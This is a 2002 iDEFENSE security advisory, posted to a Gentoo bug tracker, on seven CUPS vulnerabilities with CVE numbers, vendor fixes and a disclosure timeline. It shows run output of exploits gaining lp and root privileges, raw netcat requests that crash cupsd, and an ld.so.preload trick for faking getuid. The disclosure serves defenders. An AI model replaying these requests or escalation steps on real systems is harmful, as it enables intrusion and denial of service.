Description Daniel Ahlberg (RETIRED) 2002-12-19 12:30:32 UTC

iDEFENSE Security Advisory 12.19.02: Multiple Security Vulnerabilities in Common 
Unix Printing System (CUPS) 
 
From:  
"iDEFENSE Labs" <listserv@idefense.com> 
 
 
To:  
aliz@gentoo.org 
 
 
Date:  
Today 17.55.05 
 
 
 
Message was signed with unknown key 0xE4A96E4F. 
The validity of the signature cannot be verified. 
 
 
iDEFENSE Security Advisory 12.19.02: 
http://www.idefense.com/advisory/12.19.02.txt 
Multiple Security Vulnerabilities in Common Unix Printing System (CUPS) 
December 19, 2002 
 
 
I. BACKGROUND 
 
Easy Software Products' Common Unix Printing System (CUPS) is a 
cross-platform printing solution for Unix environments. It is based on the 
"Internet Printing Protocol," and provides complete printing services to 
most PostScript and raster printers. CUPS has a web-based graphical 
interface for printer management and is available on most Linux systems. 
More information is available at http://www.cups.org . 
 
The following major vendors are known to distribute CUPS by default; in 
some cases, it is the default printing implementation used as well: 
 
Apple Computer Inc. 
Debian Project 
FreeBSD Project 
MandrakeSoft Inc. 
NetBSD Foundation 
Red Hat Inc. 
Slackware Linux Inc. 
SuSE Inc. 
The SCO Group 
Turbolinux Inc. 
 
II. DESCRIPTION 
 
Exploitation of multiple CUPS vulnerabilities allow local and remote 
attackers in the worst of the scenarios to gain root privileges. The 
following test platforms were used for various parts of this advisory: 
 
[1] - Red Hat Linux 7.0 running CUPS-1.1.14-5 (RPM) 
[2] - Red Hat Linux 7.3 running CUPS-1.1.14-15 (RPM) 
[3] - Red Hat Linux 7.3 running CUPS-1.1.17 (Source Install) 
 
 
 
**** ISSUE 1 - Multiple Integer Overflows **** 
 
An integer overflow exists in the CUPSd http interface. Exploitation 
allows an attacker to gain the permissions of the 'lp' user id and the 
'sys' group id. The offending lines of code can be found in cgi-bin/var.c: 
 
var                  = form_vars + form_count; 
var->name            = strdup(name); 
var->nvalues         = element + 1; 
var->avalues         = element + 1; 
var->values          = calloc(element + 1, sizeof(char *)); 
var->values[element] = strdup(value); 
 
Since an attacker has control over both element and value, he or she can 
overwrite the address of a soon-to-be called function with the address of 
arbitrary code. The following is a successful run of the vanilla-coke 
exploit ran against test platform [1] built against glibc-2.2.4-18.7.0.8: 
 
$ ./vanilla-coke 
 
$ ls -l /tmp/suid 
- - - - -rwsrwsr-x 1 lp sys 14093 Dec 4 07:50 /tmp/suid 
 
$ /tmp/suid 
sh-2.04$ id 
uid=4(lp) gid=3(sys) groups=500(farmer) 
 
The exploit created a set user id 'lp' shell. While the current exploit 
works only against systems utilizing glibc-2.2.4-18.7.0.8, it is possible 
to make modifications that will make it effective against earlier glibc 
versions. The vulnerable code also exists in the latest version of CUPS 
(test platform [3]) and appears to be exploitable with slight 
modifications. 
 
Multiple integer overflows also exist in the image handling code of the 
filters in CUPS. The following is a successful run of the mksun exploit 
tested against platform [1]: 
 
$ ls -al /tmp/resulted 
/bin/ls: /tmp/resulted: No such file or directory 
 
$ ./mksun | lp 
request id is lp-100 (1 file(s)) 
 
$ cat /tmp/resulted 
Ok. 
uid=4(lp) gid=3(sys) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),40(dip) 
 
This vulnerability still exists in the latest version of CUPS (test 
platform [3]) slight modification of the exploit code is required. 
 
 
 
**** ISSUE 2 - /etc/cups/certs/ Race Condition **** 
 
A race condition exists in the creation of /etc/cups/certs/<pid>. This 
allows a local attacker to create or overwrite any file as root. A 
prerequisite to launching this attack is 'lp' user privileges, which can 
be gained through successful exploitation of ISSUE 1 (see above). 
 
The following is a successful run of the ice-cream exploit tested against 
platforms [1], [2], and [3]: 
 
sh-2.04$ /tmp/ice-cream 
Waiting for creation event. 
Trying 127.0.0.1... 
Connected to redhat7.0 (127.0.0.1). 
Escape character is '^]'. 
HTTP/1.1 200 OK 
Date: Wed, 04 Dec 2002 12:37:21 GMT 
Server: CUPS/1.1 
... 
... 
Connection closed by foreign host. 
Hit it. 
exec some suid with the lib preloading and then remove 
/etc/ld.so.preload-type-file to put things roughly the way they were. 
 
sh-2.04$ ls -l /etc/ld.so.preload-type-file 
- - - - -rw-rw-rw- 1 lp sys 20 Dec 4 07:37 /etc/ld.so.preload-type-file 
 
The sample exploit created /etc/ld.so.preload-type-file. An easy 
modification can generate /etc/ld.so.preload, which can then be used to 
gain root privileges by redefining functions such as getuid() as a simple 
"return 0". 
 
 
 
**** ISSUE 3 - Adding Printers with UDP Packets/ Root Certificate Design 
Flaw **** 
 
Printers can remotely be added to CUPS by sending a specially crafted UDP 
packet. The ability to remotely add printers is used in ISSUE 3 as well as 
in the exploitation of other subsequent vulnerabilities within this 
advisory (see below). The added printer can contain a tainted name that 
when clicked on or referenced through other means (image request, etc.) 
can exploit ISSUE 1. The exploit does not have to be locally launched 
being the shellcode can be modified to connect back to a system 
controlled by the attacker. 
 
The following is a successful run of the new-coke exploit tested against 
platforms [1] and [2]: 
 
$ ./new-coke 127.0.0.1 
Argv[1]=127.0.0.1 
punt! 
 
Checking the web interface to CUPS after running this exploit shows the 
added printer. The only way to edit or remove this printer through the web 
interface is to click on it, which will in turn exploit the vulnerability. 
 
A consequence of exploiting this vulnerability is that a local attacker 
can exploit a design flaw to gain root privileges. A printer is first 
added and configured to run on a high numbered port. It is then told to 
return a "need authorization" page. The http backend will then authorize 
with the current local root certificate, as this is the same certificate 
that is needed to access the administrative section of the web server. 
Once the certificate has been obtained, it is possible to add a printer 
that will execute commands with root privileges. 
 
The following is a successful run of the pardonme exploit script tested 
against platform [1]: 
 
$ ./pardonme.sh 
Proof of concept - stealing certificate 0 from CUPS 
=================================================== Allows access to 
/admin/ area which we use to execute code as root. 
 
- - - - - creating tmp printer to steal key from 
- - - - - telling it we want the key. 
- - - - - listening for key. 
- - - - - attempting to create rootshell printer 
- - - - - calling /tmp/doitnow 
request id is givemeroot-4 (1 file(s)) 
- - - - - removing tmp printer "hackyou" 
- - - - - removing root shell printer "givemeroot" - check /tmp/resulted 
- - - - - done 
 
=== contents of file === 
uid=0(root) gid=0(root) 
Thu Dec 5 02:19:13 GMT 2002 
=== contents of file === 
 
 
 
**** ISSUE 4 - Negative Length Memcpy() Calls **** 
 
Negative length memcpy() calls can lead to a denial of service (DoS) and, 
on some platforms, remote root compromise. The following examples 
demonstrate these vulnerabilities: 
 
$ nc -v localhost 631 
localhost [127.0.0.1] 631 (?) open 
POST /printers HTTP/1.1 
Host: localhost 
Authorization: Basic AAA 
Content-Length: -1 
 
$ nc -v localhost 631 
localhost [127.0.0.1] 631 (?) open 
POST /printers HTTP/1.1 
Host: localhost 
Authorization: Basic AAA 
Transfer-Encoding: chunked 
 
- - - - -FFFFFFFE 
 
Both requests will crash the CUPS daemon. This issue is similar to the 
Apache HTTP Server chunking bug that is exploitable on OpenBSD, FreeBSD, 
and NetBSD due to their implementations of memcpy(). Platforms [1], [2] 
and [3] are all susceptible to this vulnerability. 
 
 
 
**** ISSUE 5 - Unsafe Strncat Function Call in jobs.c **** 
 
jobs.c insecurely uses the strncat function call in the setup of the 
'options' string. As such, it is possible to exploit this in conjunction 
with the vulnerability described in ISSUE 3 to obtain local root 
privileges. To exploit the vulnerability, a printer is created. A job is 
then sent to the printer with attributes set in such a fashion as to 
overflow the options buffer and overwrite the return address of the frame. 
Shellcode is then executed. It calls an external program, /tmp/doitnow, 
which will be executed with root privileges. In the process, two files are 
created that, unless removed, should prevent CUPS from starting: 
 
/var/spool/cups/d00*-0* 
/var/spool/cups/c00* 
 
The following is a succesful run of the tosend script that utilizes the 
lift exploit. It has been tested against platform [1]: 
 
$ ./tosend.sh 
* local root 
* cupsd incorrect usage of strncat in jobs.c 
* ========================================== * proof of concept. appends 
output from "id" and "date" to 
  to /tmp/resulted 
[+] checking stuff 
 * Checking for cupsd file 
 * Checking cupsd is running 
  * checking for /sbin/pidof 
  + ok! 
  * finding pid of process 
13427 
  + ok! 
 * Checking for make 
/usr/bin/make 
 * Checking for nc 
/usr/bin/nc 
[+] Building stuff 
 * Making lift 
make: `lift' is up to date. 
* firing message (needs netcat (nc) to be in your path) 
 punt! 
[+] About to check /tmp/resulted 
- - - - - time is now Wed Dec 4 14:27:16 EST 2002 
- - - - - current uid == 500 
- - - - - current gid == 500 
 
The /tmp/doitnow script, in this case, simply contains the command "id > 
/tmp/didit.txt". The tosend script has successfully used the lift exploit, 
and the didit.txt file has been created, which, as can be seen from the 
contents, was executed with root privileges: 
 
# cat /tmp/didit.txt 
uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) 
 
The exploit is not effective against later versions of CUPS since the 
strncat() calls have been replaced with calls to strlcat(). 
 
 
 
**** ISSUE 6 - Zero Width Images in filters/image-gif.c **** 
 
CUPS improperly check for zero width images in filters/image-gif.c as can 
be seen from the following offending code: 
 
... 
  bpp       = ImageGetDepth(img); 
  pixels    = calloc(bpp, img->xsize); 
... 
            xpos ++; 
    temp += bpp; 
    if (xpos == img->xsize) 
    { 
      ImagePutRow(img, 0, ypos, img->xsize, pixels); ... 
 
 
The check for reaching the line width is not performed until after the 
increment, therefore allowing an attacker to manipulate the chunk headers 
and execute arbitrary code. 
 
The following is a successful run of the nogif exploit tested against 
platform [1]: 
 
$ ./nogif 
zero width gif exploit for cups "imageto*" filters 
imagetops filter example. 
============================ 
ppmtogif: computing other colormap... 
ppmtogif: 256 colors found 
ppmtogif: sorting colormap 
Moving img1.gif to /var/tmp 
Now make and run ./wrap to emulate printing this job. 
 
$ ./wrap 
INFO: lp 7 root img1.gif 1 /var/tmp//////////img1.gif 
DEBUG: Page = 612x792; 18,36 to 594,756 
DEBUG: ImageOpen("/var/tmp//////////img1.gif", 1, 1, 100, 0, (nil)) 
 
Successful exploitation should execute the file /tmp/sh. This 
vulnerability still exists in the latest version of CUPS (test platform 
[3]). Slight modification of the exploit code is required, however. 
 
 
 
**** ISSUE 7 - File Descriptor Resource Leaks **** 
 
Return values of many file and socket operations are not checked, 
therefore leading to file descriptor leaks. Attackers can launch a DoS 
attack against a system running CUPS. The following is a successful run of 
the fanta exploit tested against platform [1]: 
 
$ ./fanta 
 
The error below doesn't appear to show up, and the process hangs at around 
300-400 somewhere sometimes. 
 
Problem in cups is caused by file descriptor leaks, and failing to check 
return values for file operations in many areas. 
0 sent 
100 sent 
200 sent 
 
 
III. ANALYSIS 
 
Local and remote attackers can exploit the above-described vulnerabilities 
on vulnerable CUPS versions to gain superuser privileges. Exploitation is 
relatively easy in most cases given exploit code, although certain 
modifications are necessary in certain instances. 
 
IV. DETECTION 
 
CUPS-1.1.14-5, CUPS-1.1.14-15, and CUPS-1.1.17 are susceptible. See the 
detailed DESCRIPTION section above to determine the specifics of 
implementation susceptibility. 
 
V. RECOVERY 
 
Crashed daemons must be restarted in order to resume normal operations. If 
the CUPS daemon cannot restart, check for the existence of the following 
files and remove them: 
 
/var/spool/cups/d00*-0* 
/var/spool/cups/c00* 
 
VI. VENDOR RESPONSES/FIXES 
 
Michael Sweet [mike@easysw.com] of Easy Software Products said CUPS 1.1.18 
will be released December 19, 2002 which addresses all of these issues 
(http://www.cups.org) . 
 
Mark J Cox (mjc@redhat.com) of Red Hat said the following: 
 
"Red Hat Linux 7.3 and 8.0 ship with CUPS, however it is not enabled by 
default. We are currently working on producing erratum packages. When 
complete, these will be available along with our advisory. At the same 
time, users of the Red Hat Network will be able to update their systems 
using the 'up2date' tool." 
 
Richard Blanchard (rblanchard@apple.com) of Apple said the following: 
 
"Affected Systems: 
     Mac OS X 10.2 - Mac OS X 10.2.2 
     Mac OS X Server 10.2 - Mac OS X Server 10.2.2 
     Mitigating Factors:  The described vulnerability can be remotely 
exploited only when Printer Sharing is enabled. Printer Sharing is not 
enabled by default on Mac OS X or Mac OS X Server. 
Fixed in:  Mac OS X 10.2.3 and Mac OS X Server 10.2.3" 
 
VII. CVE INFORMATION 
 
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has 
assigned the following identification numbers to these issues: 
 
CAN-2002-1383: ISSUE 1 - Multiple Integer Overflows 
CAN-2002-1366: ISSUE 2 - /etc/cups/certs/ Race Condition 
CAN-2002-1367: ISSUE 3 - Adding Printers with UDP Packets/ 
                         Root Certificate Design Flaw 
CAN-2002-1368: ISSUE 4 - Negative Length Memcpy() Calls 
CAN-2002-1369: ISSUE 5 - Unsafe Strncat Function Call in jobs.c 
CAN-2002-1371: ISSUE 6 - Zero Width Images in filters/image-gif.c 
CAN-2002-1372: ISSUE 7 - File Descriptor Resource Leaks 
 
VIII. DISCLOSURE TIMELINE 
 
10/27/2002      Initial discussion with contributor 
11/14/2002      Final contributor submission 
12/12/2002      CUPS author notified via e-mail to cups-support@cups.org 
12/12/2002      iDEFENSE clients notified 
12/12/2002      Response and preliminary patch received from 
                 CUPS author Michael Sweet (mike@easysw.com) 
12/12/2002      Apple, Linux Security List (vendor-sec@lst.de) 
12/13/2002      Updated patch received from Michael Sweet 
12/17/2002      Response received from Richard Blanchard 
                 (rblanchard@apple.com) 
12/19/2002      Coordinated Public Disclosure 
 
IX. CREDIT 
 
zen-parse (zen-parse@gmx.net) discovered these issues. 
 
 
 
 
End of signed message 
 
To stop receiving iDEFENSE Security Advisories, reply to this message and 
put "unsubscribe" in the subject.